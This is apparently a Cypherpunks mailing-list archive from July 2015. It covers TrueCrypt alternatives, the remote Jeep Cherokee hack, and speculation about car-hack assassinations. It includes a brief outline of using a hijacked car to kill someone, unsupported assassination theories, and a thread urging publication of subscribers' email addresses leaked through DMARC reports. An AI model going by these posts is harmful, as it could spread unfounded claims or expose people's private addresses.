I heard an interview with Greenberg on NPR earlier in the week. Fascinating and terrifying!

-S

From sdw at lig.net Fri Jul 24 08:19:24 2015
From: sdw at lig.net (Stephen D. Williams)
Date: Fri, 24 Jul 2015 08:19:24 -0700
Subject: True Crypt is Not Secure
In-Reply-To:
References:
Message-ID: <55B2577C.7070008@lig.net>

Keep reading. As far as I know (and I've not paid diligently close attention to further developments after the aftermath died down, so please update my statements), the consensus is that that last update and the tongue-in-cheek directive to use Bitlocker was likely a warrant canary, i.e. they could no longer be independent and uncompromised so they burned the project, staying legal while upholding principles. However, shortly thereafter others have taken the previous public open source version, forked it, in some cases begun (and maybe finished) an audit of the code. The results of those should be usable as secure with some degree of confidence. YMMV.

sdw

On 7/24/15 7:46 AM, Yush Bhardwaj wrote:
> BitLocker is better or I should try something else ?
>
> WARNING: Using TrueCrypt is not secure
>
>
> http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not-secure/
>
> http://truecrypt.sourceforge.net/
> /*Yush Bhardwaj*/
>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 2904 bytes
Desc: not available
URL:

From list at sysfu.com Fri Jul 24 08:24:38 2015
From: list at sysfu.com (Seth)
Date: Fri, 24 Jul 2015 08:24:38 -0700
Subject: True Crypt is Not Secure
In-Reply-To:
References:
Message-ID:

On Fri, 24 Jul 2015 07:46:03 -0700, Yush Bhardwaj wrote:
> BitLocker is better or I should try something else ?
>
> WARNING: Using TrueCrypt is not secure
>
>
> http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not-secure/
>
> http://truecrypt.sourceforge.net/

Assuming that the platform is Windows since you mentioned BitLocker, try DiskCryptor [1]

[1] https://diskcryptor.net/wiki/Main_Page

From Rayzer at riseup.net Fri Jul 24 08:35:13 2015
From: Rayzer at riseup.net (Razer)
Date: Fri, 24 Jul 2015 08:35:13 -0700
Subject: True Crypt is Not Secure
In-Reply-To:
References:
Message-ID: <55B25B31.3070801@riseup.net>

I believe there's a fork of Truecrypt called Veracrypt that IS being audited despite the fact that recent checkups on Truecrypt show it to still be 'secure'.

RR

=-=-=-=-=-=- HTML removed on GP -=-=-=-=-=-=-=

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 819 bytes
Desc: OpenPGP digital signature
URL:

From 4chaos.onelove at gmail.com Fri Jul 24 06:23:02 2015
From: 4chaos.onelove at gmail.com (Henry Rivera)
Date: Fri, 24 Jul 2015 09:23:02 -0400
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <20150724130438.4E76DC00014@frontend1.nyi.internal>
References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal>
Message-ID:

>> On July 24, 2015 5:13:46 AM Georgi Guninski wrote:
>>
>> Not sure if this is true:
>>
>> http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/

See video of this in action here:
http://www.pbs.org/newshour/bb/hacking-researchers-kill-car-engine-highway-send-message-automakers/

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 1223 bytes
Desc: not available
URL:

From drwho at virtadpt.net Fri Jul 24 11:34:03 2015
From: drwho at virtadpt.net (The Doctor)
Date: Fri, 24 Jul 2015 11:34:03 -0700
Subject: True Crypt is Not Secure
In-Reply-To: <55B25B31.3070801@riseup.net>
References: <55B25B31.3070801@riseup.net>
Message-ID: <55B2851B.4050207@virtadpt.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 07/24/2015 08:35 AM, Razer wrote:
> I believe there's a fork of Truecrypt called Veracrypt that IS
> being audited despite the fact that recent checkups on Truecrypt
> show it to still be 'secure'.

Earlier this year I spent some time talking shop with the Veracrypt developers. My takeaway from that afternoon is that they're aiming to get as many bugs shaken out as possible and update the runtime disk encryption code for newer operating system releases. I also recall discussing third party audits of their codebase, but at the time I didn't have any suggestions for anyone to contract for that purpose.
- --
The Doctor [412/724/301/703/415] [ZS]

PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

10101110101111101001help i'm trapped in a bit factory01110101011010001010

From Rayzer at riseup.net Fri Jul 24 11:52:00 2015
From: Rayzer at riseup.net (Razer)
Date: Fri, 24 Jul 2015 11:52:00 -0700
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz>
References: <20150724120211.GA2562@sivokote.iziade.m$> <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz>
Message-ID: <55B28950.9060005@riseup.net>

+1 HST reference.

On 07/24/2015 05:18 AM, Peter Gutmann wrote:
> Georgi Guninski writes:
>
>> http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/
>>
>> I was driving 70 mph on the edge of downtown St. Louis when the exploit
>> began to take hold.
> .
> I remember saying something like "I feel a bit lightheaded; maybe you should
> drive..."
And suddenly there was a terrible roar all around us and the sky was
> full of what looked like huge bats, all swooping and screeching and diving
> around the car, which was going about a hundred miles an hour with the top
> down. And a voice was screaming: "Holy Jesus! What are these goddamn
> animals?"
>
> Peter.
>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 819 bytes
Desc: OpenPGP digital signature
URL:

From pgut001 at cs.auckland.ac.nz Fri Jul 24 05:18:01 2015
From: pgut001 at cs.auckland.ac.nz (Peter Gutmann)
Date: Fri, 24 Jul 2015 12:18:01 +0000
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <20150724120211.GA2562@sivokote.iziade.m$>
References: <20150724120211.GA2562@sivokote.iziade.m$>
Message-ID: <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz>

Georgi Guninski writes:

>http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/
>
>I was driving 70 mph on the edge of downtown St. Louis when the exploit
>began to take hold.

.

I remember saying something like "I feel a bit lightheaded; maybe you should drive..." And suddenly there was a terrible roar all around us and the sky was full of what looked like huge bats, all swooping and screeching and diving around the car, which was going about a hundred miles an hour with the top down. And a voice was screaming: "Holy Jesus! What are these goddamn animals?"

Peter.
From M373 at riseup.net Fri Jul 24 10:18:07 2015
From: M373 at riseup.net (M373)
Date: Fri, 24 Jul 2015 12:18:07 -0500
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <20150724165218.GD2562@sivokote.iziade.m$>
References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$>
Message-ID: <55B2734F.2010904@riseup.net>

On 24-Jul-15 11:52, Georgi Guninski wrote:
>> I seriously wonder if there's any assassinations that've happened with the
>> use of this mechanism. (1. wait until approaching intersection at high
>> speed, 2. disengage brakes + steering wheel, is probably very effective)
>>
> We were discussing this in chat.
> Someone suggested "sooner or later sploits like this
> will appear on black/gray sploits markets or even become
> public". Then likely car accidents will go up and
> maybe mainstream media will cry "car/hackers injure human"
> (the other way is not news, it is statistics).

Some conspiracists conjectured this might have happened in the fatal, fiery crash of the investigative journalist Michael Hastings in L.A., but without hard evidence it's the purview of the credulous prone to conspiracy theories rather than an actual one (of which there are many). Attacks had been publicly demonstrated by then. Such intrusions would be hard to trace (especially without access to do the forensics). If it hasn't happened yet, it will in the future.

People will continue to use smart cars as it's convenient and will be entrenched and socialized in by the time hoi polloi would begin to appreciate the danger. The smart car tech will also be collecting that much more info on users in the vein of smartphones, Google, Facebook, Acxiom, and the lot.
From cmagistrado at gmail.com Fri Jul 24 12:29:08 2015
From: cmagistrado at gmail.com (Chris Magistrado)
Date: Fri, 24 Jul 2015 12:29:08 -0700
Subject: Quantum Cryptography
Message-ID: <55B29204.6070904@gmail.com>

I've been lurking for awhile, but haven't seen too much on this subject. There's this DC talk that I was thinking of attending.

https://www.defcon.org/html/defcon-23/dc-23-speakers.html#Aumasson

Thoughts, references or white papers<3 ?

From Rayzer at riseup.net Fri Jul 24 12:44:23 2015
From: Rayzer at riseup.net (Razer)
Date: Fri, 24 Jul 2015 12:44:23 -0700
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <55B2734F.2010904@riseup.net>
References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net>
Message-ID: <55B29597.1090706@riseup.net>

On 07/24/2015 10:18 AM, M373 wrote:
> People will continue to use smart cars as it's convenient

People will continue to use cars like this because there's no option sans restoring an older vehicle and keeping it maintained with a diminishing supply of increasingly costly parts. Eventually, in many states, those cars will be refused registrations due to 'environment', and possibly 'fuel economy'. If they're allowed to continue on the road, they'll be antique-plated and mileage-per-year limited.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 819 bytes
Desc: OpenPGP digital signature
URL:

From odinn.cyberguerrilla at riseup.net Fri Jul 24 13:58:57 2015
From: odinn.cyberguerrilla at riseup.net (odinn)
Date: Fri, 24 Jul 2015 13:58:57 -0700
Subject: Message of Concern re.
CSIS action sent from Cryptostorm In-Reply-To: <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> References: <55B07834.1000605@riseup.net> <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> Message-ID: <55B2A711.4030809@riseup.net> Just checked my e-mail and saw confirmation from keybase that @grazestorm still exists (yay) and that we are following each other (keybase's "cryptographic utopia" message), so that's good news. On the other hand I saw some messages from cryptostorm_is on twitter that (as of about 4 hours ago) "Our anchor node in Canada - 'maple' - appears to have been offlined by content oligarchy pressure. Rolling to failover capacity for cluster. " additionally, "We'll update today as we learn more; as w/ all cstorm nodes, no data nor logs are stored & FDE-subversion attacks are a fruitless exercise." Cryptostorm is resilient and will quickly bounce right back, this "maple" node is just one of many, but it was alarming to see the staff being mistreated (I assumed, temporarily detained) by an increasingly belligerent Canadian government. -O On 07/23/2015 12:45 AM, oshwm wrote: > He's back online now, some explaining from cryptostorm soon I hope > :) > > On 23 July 2015 06:14:28 BST, odinn > wrote: Hello, > > A tweet was sent out from Cryptostorm concerning one of their > staff who was apparently taken away by the CSIS: > > https://twitter.com/cryptostorm_is/status/624070397219180544 > > The text of the tweet: > > "Core cryptostorm team member @grazestorm is currently held hostage > by rogue CSIS agents. Not a joke. Deadly serious. Please copy/RT > broadly." > > The tweet was timestamped 9:15 PM - 22 Jul 2015 > > For reference, the CSIS is the Canadian Security Intelligence > Service. > > Please keep eyes on @cryptostorm_is twitter feed and provide them > with moral and any other support you deem appropriate. Cryptostorm > are good people.
> > -O > > > > -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn From Rayzer at riseup.net Fri Jul 24 14:00:45 2015 From: Rayzer at riseup.net (Razer) Date: Fri, 24 Jul 2015 14:00:45 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B29F01.7050105@m-o-o-t.org> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> Message-ID: <55B2A77D.4020009@riseup.net> From offlist: On 07/24/2015 01:24 PM, Peter Fairbrother wrote: > Fiat Chrysler recalls 1.4 million cars after Jeep hack > > http://www.bbc.co.uk/news/technology-33650491 Was just cruising twitter and noticed that @Uconnect is touting the patch for their Chrysler in-car entertainment system. I suspect the lack of 'firewall' between it and the car control circuitry was similar to the problem that caused a China-based Mattel contractor to send lead-painted toys to be included in (was it BK?) 'happy meals' for kids. The problem? What the toy was going to be used for simply wasn't mentioned in the specs delivered to the contractor so they never took it into consideration to use a non-toxic coating.
In this case it looks like the in-car entertainment system manufacturer simply wasn't aware of the rest of the circuitry in the vehicle, and it wasn't mentioned by Chrysler, so they never even thought about it. RR From guninski at guninski.com Fri Jul 24 05:02:11 2015 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 24 Jul 2015 15:02:11 +0300 Subject: Hackers Remotely Kill a Jeep on the Highway Message-ID: <20150724120211.GA2562@sivokote.iziade.m$> Not sure if this is true: http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/ I was driving 70 mph on the edge of downtown St. Louis when the exploit began to take hold. ... Though I hadn’t touched the dashboard, the vents in the Jeep Cherokee started blasting cold air at the maximum setting, chilling the sweat on my back through the in-seat climate control system. Next the radio switched to the local hip hop station and began blaring Skee-lo at full volume. I spun the control knob left and hit the power button, to no avail. Then the windshield wipers turned on, and wiper fluid blurred the glass. ... The result of their work was a hacking technique—what the security industry calls a zero-day exploit—that can target Jeep Cherokees and give the attacker wireless control, via the Internet, to any of thousands of vehicles. ... I mentally congratulated myself on my courage under pressure. That’s when they cut the transmission. Immediately my accelerator stopped working.
From list at sysfu.com Fri Jul 24 15:11:31 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 15:11:31 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2734F.2010904@riseup.net> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> Message-ID: On Fri, 24 Jul 2015 10:18:07 -0700, M373 wrote: > On 24-Jul-15 11:52, Georgi Guninski wrote: >>> I seriously wonder if there's any assassinations that've happened with >>> the >>> use of this mechanism. (1. wait until approaching intersection at high >>> speed, 2. disengage brakes + steering wheel, is probably very >>> effective) >>> >> We were discussing this in chat. >> Someone suggested "sooner or later sploits like this >> will appear on black/gray sploits markets or even become >> public". Then likely car accidents will go up and >> maybe mainstream media will cry "car/hackers injure human" >> (the other way is not news, it is statistics). > > Some conspiracists conjectured this might have happened in the fatal, > fiery crash of the investigative journalist Michael Hastings in L.A., > but without hard evidence it's the purview of the credulous prone to > conspiracy theories rather than an actual one (of which there are many). Right, I mean the official story was such a credulous one, and no one in squeaky clean US power structure had any motive to eliminate an investigative journalist like Hastings. Oh those credulous conspiracy theorists with their crazy theories about assassination via car hacking. 
From list at sysfu.com Fri Jul 24 15:16:11 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 15:16:11 -0700 Subject: DMARC report mailing list subscriber address leaks Message-ID: I don't know if many are aware of this (I discovered it by accident myself) but if you enable dmarc reports for your domain and mail server, you'll start to get reports back that include many lurker addresses on the Cypherpunks list. I can start posting them publicly if anyone's interested. From shelley at misanthropia.org Fri Jul 24 15:28:31 2015 From: shelley at misanthropia.org (Shelley) Date: Fri, 24 Jul 2015 15:28:31 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: References: Message-ID: <20150724222815.D6297680192@frontend2.nyi.internal> On July 24, 2015 3:23:33 PM Seth wrote: > I don't know if many are aware of this (I discovered it by accident > myself) but if you enable dmarc reports for your domain and mail server, > you'll start to get reports back that include many lurker addresses on the > Cypherpunks list. > > I can start posting them publicly if anyone's interested. Nice find! Yes, it's been a while since JY posted a list of the addresses for posterity. I'm all in favor of it, before the spooks try to unsub. Anyone else? -s From guninski at guninski.com Fri Jul 24 05:32:59 2015 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 24 Jul 2015 15:32:59 +0300 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz> References: <20150724120211.GA2562@sivokote.iziade.m$> <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz> Message-ID: <20150724123259.GB2562@sivokote.iziade.m$> On Fri, Jul 24, 2015 at 12:18:01PM +0000, Peter Gutmann wrote: > Georgi Guninski writes: > > >http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/ > > > >I was driving 70 mph on the edge of downtown St. 
Louis when the exploit > >began to take hold. > . > I remember saying something like "I feel a bit lightheaded; maybe you should > drive..." And suddenly there was a terrible roar all around us and the sky was > full of what looked like huge bats, all swooping and screeching and diving > around the car, which was going about a hundred miles an hour with the top > down. And a voice was screaming: "Holy Jesus! What are these goddamn > animals?" > > Peter. I am still waiting to buy M$ "smart house": [1] http://www.technologyreview.com/view/427806/microsofts-smart-house/ [2] http://research.microsoft.com/pubs/157701/homeos.pdf Like the rest of M$ shit, it doesn't seem very popular. From EricHernandez at openmailbox.org Fri Jul 24 15:33:47 2015 From: EricHernandez at openmailbox.org (Eric Hernandez) Date: Fri, 24 Jul 2015 15:33:47 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> Message-ID: "There is reason to believe that intelligence agencies for major powers -- including the United States -- know how to remotely seize control of a car. So if there were a cyber attack on the car -- and I'm not saying there was, I think whoever did it would probably get away with it." - Richard Clarke, US Counter-Terrorism Czar during Clinton and Bush. On July 24, 2015 3:11:31 PM PDT, Seth wrote: >On Fri, 24 Jul 2015 10:18:07 -0700, M373 wrote: > >> On 24-Jul-15 11:52, Georgi Guninski wrote: >>>> I seriously wonder if there's any assassinations that've happened >with >>>> the >>>> use of this mechanism. (1. wait until approaching intersection at >high >>>> speed, 2. disengage brakes + steering wheel, is probably very >>>> effective) >>>> >>> We were discussing this in chat. 
>>> Someone suggested "sooner or later sploits like this >>> will appear on black/gray sploits markets or even become >>> public". Then likely car accidents will go up and >>> maybe mainstream media will cry "car/hackers injure human" >>> (the other way is not news, it is statistics). >> >> Some conspiracists conjectured this might have happened in the fatal, >> fiery crash of the investigative journalist Michael Hastings in L.A., >> but without hard evidence it's the purview of the credulous prone to >> conspiracy theories rather than an actual one (of which there are >many). > >Right, I mean the official story was such a credulous one, and no one >in >squeaky clean US power structure had any motive to eliminate an >investigative journalist like Hastings. > >Oh those credulous conspiracy theorists with their crazy theories about > >assassination via car hacking. From shelley at misanthropia.org Fri Jul 24 15:35:13 2015 From: shelley at misanthropia.org (Shelley) Date: Fri, 24 Jul 2015 15:35:13 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> Message-ID: <20150724223457.E4F346800EB@frontend2.nyi.internal> On July 24, 2015 3:20:23 PM Seth wrote: > On Fri, 24 Jul 2015 10:18:07 -0700, M373 wrote: > > > On 24-Jul-15 11:52, Georgi Guninski wrote: > >>> I seriously wonder if there's any assassinations that've happened with > >>> the > >>> use of this mechanism. (1. wait until approaching intersection at high > >>> speed, 2. disengage brakes + steering wheel, is probably very > >>> effective) > >>> > >> We were discussing this in chat.
> >> Someone suggested "sooner or later sploits like this > >> will appear on black/gray sploits markets or even become > >> public". Then likely car accidents will go up and > >> maybe mainstream media will cry "car/hackers injure human" > >> (the other way is not news, it is statistics). > > > > Some conspiracists conjectured this might have happened in the fatal, > > fiery crash of the investigative journalist Michael Hastings in L.A., > > but without hard evidence it's the purview of the credulous prone to > > conspiracy theories rather than an actual one (of which there are many). > > Right, I mean the official story was such a credulous one, and no one in > squeaky clean US power structure had any motive to eliminate an > investigative journalist like Hastings. > > Oh those credulous conspiracy theorists with their crazy theories about > assassination via car hacking. Calling something a conspiracy theory is a common disinfo tactic. We used to have to play Spot the Fed, now they out themselves... -s From coderman at gmail.com Fri Jul 24 15:36:43 2015 From: coderman at gmail.com (coderman) Date: Fri, 24 Jul 2015 15:36:43 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: <20150724222815.D6297680192@frontend2.nyi.internal> References: <20150724222815.D6297680192@frontend2.nyi.internal> Message-ID: On 7/24/15, Shelley wrote: > ... I'm all in favor of it, do it! From list at sysfu.com Fri Jul 24 15:45:10 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 15:45:10 -0700 Subject: Building a trustworthy computer OSCON talk by Matthew Garrett Message-ID: Not sure if anyone was attending OSCON today and caught this talk earlier, but if have audio or video please post. 
http://www.oscon.com/open-source-2015/public/schedule/detail/41536 Building a trustworthy computer Matthew Garrett (CoreOS) 11:10am–11:50am Friday, 07/24/2015 Protect D139/140 Tags: Open hardware, Tools and techniques, Geek life lifestyle Average rating: ***** (5.00, 1 rating) Rate This Session Slides: http://cdn.oreillystatic.com/en/assets/1/event/129/Building%20a%20trustworthy%20computer%20Presentation.odp Prerequisite Knowledge Some knowledge of the major components of a modern computer and how they fit together, but no detailed knowledge of firmware or hardware design is required. Description The Snowden revelations demonstrated the lengths that government agencies were willing and able to go to in order to subvert computers. But these attacks aren’t limited to state-level actors – security researchers continue to demonstrate new vulnerabilities and weaknesses that would permit sophisticated criminals to achieve the same goals. In the face of these advanced attacks, what can we do to detect and mitigate them? How can we make use of existing security features, and what changes can we make to system design? In short, how can we ensure that a user can trust that their computer is acting in their interests rather than somebody else’s? This presentation will cover some of the existing security features and recent design changes in systems that can make it easier to detect attacks, and provide mechanisms for defending against them in the first place, along with simple design changes that would make it easier for users to ensure that components haven’t been backdoored. In addition it will discuss some of the remaining challenges that don’t have solid answers as yet.
Topics covered will include: Firmware security Trusted platform modules, attestation, and associated privacy risks Hardware design to support offline verification Remaining components that could act against the interests of the hardware owner Photo of Matthew Garrett Matthew Garrett CoreOS Matthew Garrett is a security developer at CoreOS, specializing in the areas where software starts knowing a little more about hardware than you’d like. He implemented much of Linux’s support for UEFI Secure Boot, does things with TPMs and has found more bugs in system firmware than he’s entirely comfortable with. From sio at tesser.org Fri Jul 24 08:47:30 2015 From: sio at tesser.org (Sharif Olorin) Date: Fri, 24 Jul 2015 15:47:30 +0000 Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: <1437752365-sup-6750@metis.syd1.tesser.org> > BitLocker is better or I should try something else ? > > WARNING: Using TrueCrypt is not secure TrueCrypt has been audited[0] and come through relatively unscathed; I'd trust it over a Microsoft product I'd need to disassemble to examine any day. Of course, in reality I just use dm-crypt. [0] https://opencryptoaudit.org/ -- OpenPGP: 6FB7 ED25 BFCF 3E22 72AE 6E8C 47D4 CE7F 6B9F DF57 From skquinn at rushpost.com Fri Jul 24 14:42:08 2015 From: skquinn at rushpost.com (Shawn K.
Quinn) Date: Fri, 24 Jul 2015 16:42:08 -0500 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724165218.GD2562@sivokote.iziade.m$> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> Message-ID: <1437774128.1029.2.camel@moonpatrol> On Fri, 2015-07-24 at 19:52 +0300, Georgi Guninski wrote: > btw, Who are the owners/manufacturers of this jeep? > AMC? The Jeep marque has been part of the Chrysler family of brands (the others being Chrysler, Dodge, and Ram, and previously Plymouth and Eagle) since 1987 per Wikipedia. The current corporate owner is Fiat Chrysler Automobiles (FCA) as mentioned in the article. -- Shawn K. Quinn From odinn.cyberguerrilla at riseup.net Fri Jul 24 17:14:52 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Fri, 24 Jul 2015 17:14:52 -0700 Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: <55B2D4FC.3040805@riseup.net> I thought that this was already answered long ago... but it keeps getting brought up from time to time. For what I consider to be the definitive answer on why you should not use TrueCrypt and what alternatives to it are, see: http://grugq.tumblr.com/post/60464139008/alternative-truecrypt-implementations Note that from TAILS 1.0.1 they incorporated LUKS, and I recommend cryptsetup, the "Swiss Army Knife of Disk Encryption." In any event, you'll definitely want to check out this: https://github.com/bwalex/tc-play Should be helpful. -O On 07/24/2015 07:46 AM, Yush Bhardwaj wrote: > BitLocker is better or I should try something else ?
> > WARNING: Using TrueCrypt is not secure > > > http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not-secure/ > > http://truecrypt.sourceforge.net/ > /*Yush Bhardwaj*/ > -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn From list at sysfu.com Fri Jul 24 17:44:59 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 17:44:59 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> Message-ID: On Fri, 24 Jul 2015 17:14:19 -0700, Zenaan Harkness wrote: > Plenty of suspicious private (and not so) jet crashes over the years > too. Non-overridable remote-control systems - what could possibly go > wrong? I've heard activist Ken O'Keefe claim that most or all modern passenger jets are equipped with a 'Flight Termination System'. Maybe this is one such provider? http://www.kratos-msi.com/products/flight-termination-products/ From odinn.cyberguerrilla at riseup.net Fri Jul 24 17:49:20 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Fri, 24 Jul 2015 17:49:20 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: References: Message-ID: <55B2DD10.7090600@riseup.net> Yep.
On 07/24/2015 03:16 PM, Seth wrote: > I don't know if many are aware of this (I discovered it by > accident myself) but if you enable dmarc reports for your domain > and mail server, you'll start to get reports back that include many > lurker addresses on the Cypherpunks list. > > I can start posting them publicly if anyone's interested. > -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn From oottela at cs.helsinki.fi Fri Jul 24 08:17:31 2015 From: oottela at cs.helsinki.fi (Markus Ottela) Date: Fri, 24 Jul 2015 18:17:31 +0300 Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: <55B2570B.6090106@cs.helsinki.fi> What the warning by developers means is, in the event a vulnerability would be found in Truecrypt, no one would be there to fix it. Except for the entire open source community who would publish dozens of articles "here's how to fix the vulnerability in source code before recompiling it" accompanied with warnings "doing this breaks the truecrypt licence". This is true, and you might be in trouble in case the anonymous developers want to stop being anonymous and prosecute you across different jurisdictions. So, unlikely. Also read these: http://istruecryptauditedyet.com/ http://blog.cryptographyengineering.com/2015/04/truecrypt-report.html https://www.grc.com/misc/truecrypt/truecrypt.htm I heard TC uses insufficiently low iteration count for PBKDF2?
-- this doesn't change the fact a high entropy passphrase (>128bits) remains unbreakable in feasible time. On 24.07.2015 17:46, Yush Bhardwaj wrote: > BitLocker is better or I should try something else ? > > WARNING: Using TrueCrypt is not secure > > > http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not-secure/ > > http://truecrypt.sourceforge.net/ > /*Yush Bhardwaj*/ > From M373 at riseup.net Fri Jul 24 16:46:28 2015 From: M373 at riseup.net (M373) Date: Fri, 24 Jul 2015 18:46:28 -0500 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> Message-ID: <55B2CE54.8020301@riseup.net> It's not a matter of credulity in believing that authorities would carry out such an assassination, the problem is asserting such an act without direct evidence. As I said, and as insider Richard Clarke said, it would be difficult to show. "What has been revealed as a result of some research at universities is that it's relatively easy to hack your way into the control system of a car, and to do such things as cause acceleration when the driver doesn't want acceleration, to throw on the brakes when the driver doesn't want the brakes on, to launch an air bag," "in the case of Michael Hastings, what evidence is available publicly is consistent with a car cyber attack. And the problem with that is you can't prove it." It's a conundrum uncovering such operations. If the US has not taken such acts yet, it, and others, will do so.
It's akin to the older problem of knowing if someone was poisoned in a way to appear as a natural malady. Intel agencies have long used such measures. On 24-Jul-15 17:33, Eric Hernandez wrote: > "There is reason to believe that intelligence agencies for major > powers -- including the United States -- know how to remotely seize > control of a car. So if there were a cyber attack on the car -- and > I'm not saying there was, I think whoever did it would probably get > away with it." > > - Richard Clarke, US Counter-Terrorism Czar during Clinton and Bush. > > On July 24, 2015 3:11:31 PM PDT, Seth wrote: > > On Fri, 24 Jul 2015 10:18:07 -0700, M373 wrote: > > On 24-Jul-15 11:52, Georgi Guninski wrote: > > I seriously wonder if there's any assassinations > that've happened with the use of this mechanism. (1. > wait until approaching intersection at high speed, 2. > disengage brakes + steering wheel, is probably very > effective) > > We were discussing this in chat. Someone suggested "sooner > or later sploits like this will appear on black/gray > sploits markets or even become public". Then likely car > accidents will go up and maybe mainstream media will cry > "car/hackers injure human" (the other way is not news, it > is statistics). > > Some conspiracists 